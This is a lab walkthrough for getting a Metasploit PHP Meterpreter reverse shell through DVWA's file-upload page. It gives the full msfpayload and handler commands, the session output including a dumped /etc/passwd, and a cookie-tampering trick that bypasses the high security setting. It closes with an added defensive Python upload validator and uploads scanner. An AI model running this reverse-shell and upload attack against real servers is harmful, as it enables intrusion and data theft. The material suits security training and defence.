Control – Metasploit PHP file upload

msfpayload is a command-line instance of Metasploit that is used to generate and output all of the various types of shellcode that are available in Metasploit.

1. Using msfpayload in BackTrack 5 R1:

root@bt:~# msfpayload php/meterpreter/reverse_tcp LHOST=Your-IP-Address LPORT=8080 R > connection.php

2. connection.php is created in root's home directory.

3. Open msfconsole and run:

use exploit/multi/handler

set PAYLOAD php/meterpreter/reverse_tcp

set LHOST Your-IP-Address

set LPORT 8080

exploit

4. Upload the file to the website, then browse to it, e.g. dvwa/hackable/uploads:
[ ]    connection.php    21-Jan-2011 11:06     1.3K

5. Double-click it.

This should make the remote server connect back to your PC:

[*] Started reverse handler on your-ip-address:8080
[*] Starting the payload handler...
[*] Sending stage (38791 bytes) to their-ip-address
[*] Meterpreter session 1 opened (your-ip-address:8080 -> their-ip-address:49119) at 2012-06-26 15:00:18 +0100

meterpreter >

meterpreter > sysinfo
Computer    : dojo-vm
OS          : Linux dojo-vm 2.6.32-25-generic #44-Ubuntu SMP Fri Sep 17 20:26:08 UTC 2010 i686
Meterpreter : php/php

meterpreter > getuid
Server username: www-data (33)
meterpreter > shell
Process 1639 created.
Channel 0 created.

ls -l
total 8
-rw-r--r-- 1 www-data www-data 1318 Jun 26 09:58 connectback.php
-rw-r--r-- 1 www-data www-data  667 Sep 30  2010 dvwa_email.png

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:107::/var/run/dbus:/bin/false
avahi-autoipd:x:103:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:104:111:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
couchdb:x:105:113:CouchDB Administrator,,,:/var/lib/couchdb:/bin/bash
speech-dispatcher:x:106:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
usbmux:x:107:46:usbmux daemon,,,:/home/usbmux:/bin/false
haldaemon:x:108:114:Hardware abstraction layer,,,:/var/run/hald:/bin/false
kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:110:115:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:111:117:RealtimeKit,,,:/proc:/bin/false
saned:x:112:118::/home/saned:/bin/false
hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false
gdm:x:114:120:Gnome Display Manager:/var/lib/gdm:/bin/false
dojo:x:1000:1000:Dojo,,,:/home/dojo:/bin/bash
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
mysql:x:115:123:MySQL Server,,,:/var/lib/mysql:/bin/false


If you get "Your image was not uploaded.":

1. Open the Firefox Tamper Data plugin and start tampering.

Re-upload the .php file and look under Request Header Value:

Cookie=security=high; security=low; PHPSESSID=p3lhtk3vnc2tb9oo9s4e89okn0

2. Change this to:

Cookie=security=low; security=low; PHPSESSID=p3lhtk3vnc2tb9oo9s4e89okn0

3. Let Tamper Data push the modified request through.

The image was uploaded.
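The upload only gets through because the application accepts a .php file at the low setting and lets a client-editable cookie pick that setting. As an added example (not code from the original post or from DVWA), here is the kind of server-side check that would reject connection.php at upload time regardless of the cookie, plus a scan that finds PHP code already sitting in an uploads directory whatever the file is called; ALLOWED, MAGIC, upload_verdict, scan_uploads and build_sample_dir are names chosen here, and the sample files are constructed for the demo.

```python
# Added example (not DVWA's code); sample data below is constructed for the demo.
import os
import re
import tempfile

ALLOWED = {".png": ".png", ".jpg": ".jpg", ".jpeg": ".jpg", ".gif": ".gif"}
# Magic bytes of accepted image formats; the client's Content-Type header and
# the security-level cookie are attacker-controlled, so neither is consulted.
MAGIC = {b"\x89PNG\r\n\x1a\n": ".png", b"\xff\xd8\xff": ".jpg",
         b"GIF87a": ".gif", b"GIF89a": ".gif"}
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)

def upload_verdict(filename: str, data: bytes) -> tuple:
    """Return (accepted, reason) using only facts the server can verify."""
    base = os.path.basename(filename).lower()
    ext = os.path.splitext(base)[1]
    if ext not in ALLOWED:
        return False, "extension not allowed"
    if base.count(".") != 1:  # a.php.png: some server configs map both parts
        return False, "multiple extensions"
    fmt = next((f for sig, f in MAGIC.items() if data.startswith(sig)), None)
    if fmt is None:
        return False, "not a recognised image"
    if ALLOWED[ext] != fmt:
        return False, "extension does not match content"
    if PHP_TAG.search(data):  # code appended to or embedded in a real image
        return False, "php tag inside image"
    return True, "ok"

def scan_uploads(directory: str) -> list:
    """List files under an uploads directory that contain a PHP open tag."""
    hits = []
    for root, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            with open(path, "rb") as fh:
                if PHP_TAG.search(fh.read()):
                    hits.append(os.path.relpath(path, directory))
    return sorted(hits)

def build_sample_dir() -> str:
    """Constructed uploads directory: one real-looking PNG, one PHP file."""
    d = tempfile.mkdtemp()
    with open(os.path.join(d, "dvwa_email.png"), "wb") as fh:
        fh.write(b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)
    with open(os.path.join(d, "connection.php"), "wb") as fh:
        fh.write(b"<?php echo 'constructed sample'; ?>")
    return d
```

Run scan_uploads against the real uploads directory from cron or a file-integrity job; a legitimate image directory should return an empty list.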
